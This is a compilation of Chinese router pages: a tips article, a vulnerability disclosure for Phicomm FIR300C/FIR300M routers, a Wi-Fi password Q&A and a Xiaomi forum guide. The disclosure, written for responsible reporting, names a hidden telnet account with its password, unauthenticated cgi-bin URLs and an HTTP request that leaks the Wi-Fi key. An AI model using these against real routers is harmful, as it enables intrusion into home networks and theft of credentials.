这几个方法能使你的路由器变得更快更安全
[摘要]大多数人对待路由器的态度基本上都是初始设置完成之后便置之不理，实际上，调节路由器设置并没有你想得那么难。
腾讯数码讯（肖恩）大多数人对待路由器的态度基本上都是初始设置完成之后便置之不理，除非网络出现问题。实际上，调节路由器设置并没有你想得那么难，且能带来不少的好处。如果你想让自家Wi-Fi变得更快更安全，下面这些调节方法都是值得尝试的。1.更改信道更改信道能够避免由其他设备引起的干扰。虽然如今的路由器已经具备了更强的信道选择能力，但你也可以手动选择以提升速度和稳定性。你可以使用Acrylic Wi-Fi和Netgear Wi-Fi Analytics等免费工具来查看家里哪个信道最繁忙，然后将路由器所使用的信道更改成状态最佳的。2.优先设备
来源：腾讯视频
市面上一些更新或更高端的路由器都支持为特定应用或设备提供优先权，让它们拥有更多的带宽。当你在玩在线游戏或播放在线视频时，这一功能可带来明显不同。这项技术一般被称作Qos或WMM，不同路由器的执行方式都不尽相同，你可以根据自己的需要为设备设定优先级。3.切换到最高速度大多数路由器都可以处理现有几乎所有的Wi-Fi标准，比如最老的802.11a和最新最快的802.11ac。如果你家里的笔记本和智能手机都支持最新802.11ac标准，那你可以让路由器专注于提供最快的速度，而不是去照顾更老的设备。4.隐藏SSID路由器在默认状态下会广播自己的SSID（服务集标识符），好让新设备可以快速加入其网络。如果你将其隐藏，那么就只能手动输入SSID来加入网络。这样做虽然有点麻烦，但的确也能带来不少的好处，比如降低蹭网的几率。5.升级固件和智能手机一样，路由器厂商也会通过固件升级来修复漏洞并提升稳定性，因此你应该经常检查自己的路由器是否有新的固件可用。不过路由器的固件升级相比智能手机要复杂一些，你应该遵照厂商给出的指南进行。来源：
[责任编辑：canyan]
还能输入140字
Copyright & 1998 - 2016 Tencent. All Rights Reserved分享漏洞：
披露状态：
： 细节已通知厂商并且等待厂商处理中
： 厂商已经确认，细节仅向厂商公开
： 细节向第三方安全合作伙伴开放（、、）
： 细节向核心白帽子及相关领域专家公开
： 细节向普通白帽子公开
： 细节向实习白帽子公开
： 细节向公众公开
简要描述：
上海斐讯数据通信技术有限公司（以下简称&PHICOMM斐讯&）成立于2009年，其全球总部位于中国-上海，是一家致力于向用户及客户提供移动终端、数据通信产品、云计算等各种软硬件及整体解决方案的研发型高新技术企业，集研发、制造、销售于一体，用户范围涵盖个人消费者、企业、政府、各行业等不同层次。 PHICOMM 斐讯秉承“致力于更自由的沟通”这一使命，构建起了&快速响应、高性价比&的公司整体核心竞争力，使公司成立6年间以每年超过200%的增速快速发展，至2014年公司年销售额达100亿人民币，跻身中国电子信息百强。
斐讯某几款路由器存在同样的安全漏洞。
详细说明：
6.18乘着京东搞活动入手一个斐讯的路由器，型号为FIR300C，价格不贵功能还不少，到手第一件事就是上网下载新固件更新，官网上的最新固件版本为SW_FIR300C__V**.**.**.**，放出时间为，如图：
更新完固件忍不住好奇对该路由器进行一番摸索，扫描发现该路由器的lan口开放23及80端口，但wan口没有扫到对应开放的端口，捣鼓一阵后发现存在如下安全漏洞：
1.内置隐藏管理员账号可用于telnet登录，用户名support，密码support，telnet服务默认开放而且无法关闭（也可能我没找到关闭的设置处），如图：
2.CGI-BIN目录没有设置访问权限，导致攻击者不用登录即可随意访问，影响如下：
http://IP/cgi-bin/reboot.sh
重启路由器
http://IP/cgi-bin/ExportSettings.sh
导出路由器配置，导出的配置文件中用户名及密码为明文存放，还有其它的重要信息也一并暴露，如图：
http://IP/cgi-bin/upload.cgi
可上传固件文件进行更新
http://IP/cgi-bin/upload_bootloader.cgi
可上传boot文件进行更新
http://IP/cgi-bin/upload_settings.cgi
可上传配置文件更改路由器配置
3.同样为权限设置问题，攻击者可以不需要合法身份即可直接访问内置页面，如提交下面的数据
POST http://*.*.*.*/goform/wirelessGetSecurity HTTP/1.1
Accept: */*
Referer: http://*.*.*.*/status.asp
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 ( MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: *.*.*.*
Content-Length: 3
Connection: Keep-Alive
Pragma: no-cache
上面n/a为post提交的数据内容，发送完即可收到路由器响应送回的无线路由配置信息
HTTP/1.1 200 OK
Content-type: text/plain
Pragma: no-cache
Cache-Control: no-cache
此处为明文SSID
此处为明文PSK
路由器的无线配置就可轻松得到。
虽然该路由器没有在wan口上开放23及80端口，但是不代表只有内网用户才能入侵该路由，
结合前期出现的路由器入侵方法，在网页上设置恶意脚本是完全可以做到的。同时对该厂家的其它型号路由器进行对比分析，发现FIR300C和FIR300M及FIR300M(plus)同属一个固件系列，存在同样的安全漏洞。
漏洞证明：
修复方案：
增加权限判断。
版权声明：转载请注明来源 @
厂商回应：
危害等级：高
漏洞Rank：11
确认时间： 07:10
厂商回复：
CNVD确认所述情况，已经由CNVD通过网站公开联系方式向软件生产厂商通报。
最新状态：
漏洞评价：
对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值
漏洞评价(共0人评价):
登陆后才能进行评分
必须在获取到无线密码的情况下才能利用漏洞吗？
@aygj1412 可以在公网远程利用
登录后才能发表评论，请先不想被蹭网，无线路由器怎么设置密码最安全... | 问答 | 问答 | 果壳网 科技有意思
不想被蹭网，无线路由器怎么设置密码最安全？
无线路由设置密码的安全性怎么保护。
+ 加入我的果篮
无线加密方式：选择较新的wpa2-psk，否则用专业软件可以几分钟内就破解掉老的wep加密方式。增加密码强度：至少8位，隔一段时间就换一次。包含大写字母，小写字母、数字、特殊符号这四种中的三种及以上。这个主要是增加暴力破解的难度。QSS功能关闭或者修改掉默认的pin码：这个主要是目前dlink、tplink等主流无线路由器厂商的qss默认pin的分配算法已经被破解，其他人可以利用Qss认证的漏洞攻入。Mac地址绑定和关闭DHCP：让别人连上你的路由器也分不到IP地址。关闭SSID广播，这样别人就看不到你的网络。一劳永逸
绑MAC嘛，再不行就只能用物理的方法屏蔽信号了。。
电子信息硕士，高校教师，奶爸
改IP，用AES，隐藏SSID，关闭DHCP，绑定MAC，IP过滤。
经常换，套用随机函数
通信工程、计算机硕士
关于密码安全，还是看你要达到什么等级的防护了。世界上没有绝对安全的密码，只有不值得破译的密码。一般来说，家庭级的防护主要看你周围是否有积极蹭网的人。如果没人蹭网，你压根不需要什么防护，随便设置个密码或者就行了（建议不要使用这种弱爆了的密码）。如果常常有人蹭网，你就得打一场网络防御战了。密码设置方式macross说的很详细！对于居住人口固定的地区，还可以想办法搜到蹭网者，直接上门骚扰。
医疗器械售后工程师
尼玛， 七年前我家装宽带的时候我就设置了开放路由，路由开放共享是很自然的一件事，有必要弄成这么严重没。
建筑设施技术本科生、ACMer
经常更换才是王道啊，对强行抓包来说，密码强度什么的都是浮云。
不是有mac地址绑定这个东西的么
无短板的短桶
设长一点儿字母数字加特殊符号对于一般人够了。不行再绑定mac要连这你都防不住蹭你网的人，就放弃抵抗吧。
工程管理本科生
把网线放长一点连电脑上，完全不用担心蹭网问题
Stones and peddles in BS
有用 BACK TRACK 5 蹭网的吗？纯技术回帖。。勿喷
OIer 云架构工程师
隐藏SSID又不是找不出来...
爪哇橙絮猿
不广播（隐藏SSID）已经能把绝大部分人挡住了，不过既然是破密码蹭网，当然是有点水平的。白名单（绑定MAC一般路由器都有）、限制连接用户数（比如设为1，只要你连着，别人就连不上），差不多了。
我。。我想你应该是很讨厌我的0.0
后回答问题，你也可以用以下帐号直接登录
(C)2016果壳网&&&&&京ICP备号-2&&&&&神仙级手机控
楼主的荣誉
扫码下载App一键签到 升级加速
小米路由器每周精华帖汇总
小米路由器使用问题汇总
如何姿态优美地问出WiFi密码？
小米路由【私密盘】隐藏你的大片！！！新手详解。
&来自老版论坛
扫一扫！手机看帖更爽
本文已被推荐至小米社区首页 ：）
By 小米路由器专区
& && &入手小米路由器已经有一段时间了，以前对于隐私盘刚开始我也没有弄明白什么意思。一直也没有研究，但是最新找了些大片为了不让外人看见，就研究了一下，小有心得，一起分享一下。
一、开启“私密盘”
在手机路由app（电脑端也可以设置）中选择开启的设备，并勾选私密盘。
在手机自带的视频中，打开网络设备，可以观看路由中的视频文件。
需要注意，开启和关闭私密盘后，需要重启手机才可以生效。（如原来没有开启，当时打开后，进入隐私盘还是进不去的。我只试过重启后就进入了。理论上重新连接无线网络应该也可以，不过还没有测试{:enheng:}）
电脑上开启后，会出现加小锁的路由盘。
二、添加私密文件
主要介绍一下手机端操作，电脑端直接复制到小米的私密盘里就好。
进入手机端，在路由盘内选中药放私密盘的文件（手指按住不放），选择移动。
选择“私密盘”
找到要存放的文件夹，点击“粘贴”，就完成啦。
三、小米电视中查看私密文件
首先还是要在手机端或电脑端开启私密盘。
但是打开小米路由，或是高清播放器中的私密盘，都提示这个
明明放好几个文件的，竟然看不了，我也是找了好久终于找到。{:wuhohoho:}
在高清播放器----设备中---1个DLNA设备文件内
终于都出现了。{:haokaixin:}
四、其他隐藏方法。
我以前一直用的方法，也很简单，就是修改文件的后缀，使得系统监测不到文件，适合手机和电视观看使用，不用加私密也可以。但是用ES文件浏览器等文件查看时也会暴露。慎用！
选择文件，点击“更多”
选择重命名
光标移动到“.”后，删除。
好了完成，点击确定。
再恢复文件也是同样的操作，再把“.”加上就好了。
本篇适合新手学习，有好的方法请留言相互学习。大婶请提出宝贵意见。谢谢！！
扫描二维码，手机查看本帖
已有1人评分
总评分： 经验 +1
哈哈，楼主求资源啊！
私密盘不够私密
点文件，设置不共享，行不？！
根本就没有私密盘，只有个路由盘
这个要学习，好贴要顶！！
对根本没有私密盘，小米盒子如果设置成可以访问，谁点个遥控都可以进。应该设置成密码进入，买次进就用密码，这才算私密吧
楼主S吧，你把APP升级下，然后在找找有没有私密盘功能？？？
根本就没有私密盘，只有个路由盘
哎，这个功能有何用啊
御姐也哀伤交出来
1024进不去了，楼主能私信大片地址吗？
anqi1988 发表于
15:07:47能提供点资源吗？？？？？哈哈哈。。。。。。。。。。。。。。。
能提供点资源吗？？？？？
·来自老版论坛
学习了，闲了研究研究
·来自老版论坛
发图不发种，XX被人捅啊 楼主
·来自老版论坛
太麻烦了吧，申请个115网盘，隐秘的东西放在网盘里，电视装个115云TV版，全搞定，请叫我雷锋
·来自老版论坛
是啊 现在升级后没有可以设置私密盘的了 求新方法
·来自老版论坛
唉，现在都没私密盘了！
·来自老版论坛
这功能太好了，有些小咪咪真的不能随便展示
·来自老版论坛
大神，目前手机端点击选择完文件后，没有复制这些操作按钮啊。。。求解决。
京ICP证110507号 京ICP备号